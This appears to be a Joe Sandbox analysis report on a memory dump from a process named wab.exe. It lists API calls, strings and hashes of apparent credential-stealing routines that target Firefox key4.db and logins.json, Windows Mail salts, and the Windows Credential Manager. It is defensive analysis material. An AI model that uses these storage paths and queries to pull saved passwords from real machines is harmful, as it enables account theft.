                                                                                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                  • API String ID: 231171946-2189169393
                                                                                  • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                  • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                  • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                  • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                  • API String ID: 633282248-1996832678
                                                                                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                  • , xrefs: 00406834
                                                                                  • key4.db, xrefs: 00406756
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memcmp$memsetstrlen
                                                                                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                  • API String ID: 3614188050-3983245814
                                                                                  • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                  • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                  • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                  • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                  • API String ID: 710961058-601624466
                                                                                  • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                  • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                  • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                  • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: sprintf$memset$_mbscpy
                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                  • API String ID: 3402215030-3842416460
                                                                                  • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                  • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                  • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                  • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                  • strlen.MSVCRT ref: 0040F139
                                                                                  • strlen.MSVCRT ref: 0040F147
                                                                                  • memset.MSVCRT ref: 0040F187
                                                                                  • strlen.MSVCRT ref: 0040F196
                                                                                  • strlen.MSVCRT ref: 0040F1A4
                                                                                  • memset.MSVCRT ref: 0040F1EA
                                                                                  • strlen.MSVCRT ref: 0040F1F9
                                                                                  • strlen.MSVCRT ref: 0040F207
                                                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                  • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                  • _mbscpy.MSVCRT ref: 0040F30E
                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                  • API String ID: 1613542760-3138536805
                                                                                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                  • API String ID: 1012775001-1343505058
                                                                                  • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                  • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                  • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                  • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi
                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                  • API String ID: 1439213657-1959339147
                                                                                  • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                  • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                  • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                  • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00444612
                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                  • strlen.MSVCRT ref: 0044462E
                                                                                  • memset.MSVCRT ref: 00444668
                                                                                  • memset.MSVCRT ref: 0044467C
                                                                                  • memset.MSVCRT ref: 00444690
                                                                                  • memset.MSVCRT ref: 004446B6
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                  • memcpy.MSVCRT ref: 004446ED
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                  • memcpy.MSVCRT ref: 00444729
                                                                                  • memcpy.MSVCRT ref: 0044473B
                                                                                  • _mbscpy.MSVCRT ref: 00444812
                                                                                  • memcpy.MSVCRT ref: 00444843
                                                                                  • memcpy.MSVCRT ref: 00444855
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset$strlen$_mbscpy
                                                                                  • String ID: salu
                                                                                  • API String ID: 3691931180-4177317985
                                                                                  • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                  • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                  • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                  • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                  • API String ID: 2449869053-232097475
                                                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                  • strlen.MSVCRT ref: 00443AD2
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                  • memset.MSVCRT ref: 00443B2E
                                                                                  • memset.MSVCRT ref: 00443B4B
                                                                                  • _mbscpy.MSVCRT ref: 00443B79
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                  • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                                                                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                  Strings
                                                                                  • Salt, xrefs: 00443BA7
                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                  • API String ID: 665470638-2687544566
                                                                                  • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                                                                  • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                  • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                                                                  • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • sprintf.MSVCRT ref: 0040957B
                                                                                  • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                  • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                  • sprintf.MSVCRT ref: 004095EB
                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                  • memset.MSVCRT ref: 0040961C
                                                                                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                  • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                  • API String ID: 3259144588-3822380221
                                                                                  • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                  • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                  • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                  • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                  • API String ID: 2449869053-4258758744
                                                                                  • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                  • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                  • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                  • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                  • memset.MSVCRT ref: 0040F84A
                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                  • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                  • String ID: Creds$ps:password
                                                                                  • API String ID: 551151806-1872227768
                                                                                  • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                  • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                  • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                  • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcsstr.MSVCRT ref: 0040426A
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                  • _mbscpy.MSVCRT ref: 004042D5
                                                                                  • _mbscpy.MSVCRT ref: 004042E8
                                                                                  • strchr.MSVCRT ref: 004042F6
                                                                                  • strlen.MSVCRT ref: 0040430A
                                                                                  • sprintf.MSVCRT ref: 0040432B
                                                                                  • strchr.MSVCRT ref: 0040433C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                  • API String ID: 3866421160-4070641962
                                                                                  • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                  • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _mbscpy.MSVCRT ref: 00409749
                                                                                  • _mbscpy.MSVCRT ref: 00409759
                                                                                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                  • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                  • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                  • _mbscpy.MSVCRT ref: 004097A1
                                                                                  • memset.MSVCRT ref: 004097BD
                                                                                  • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                  • API String ID: 1035899707-3647959541
                                                                                  • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                  • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                  • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                  • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy
                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                  • API String ID: 714388716-318151290
                                                                                  • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                  • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                  • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                  • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                  • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                  • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                  • SetFocus.USER32(?), ref: 0040CB92
                                                                                  • SetFocus.USER32(?), ref: 0040CC0B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                  • String ID:
                                                                                  • API String ID: 1416211542-0
                                                                                  • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                  • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                  • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
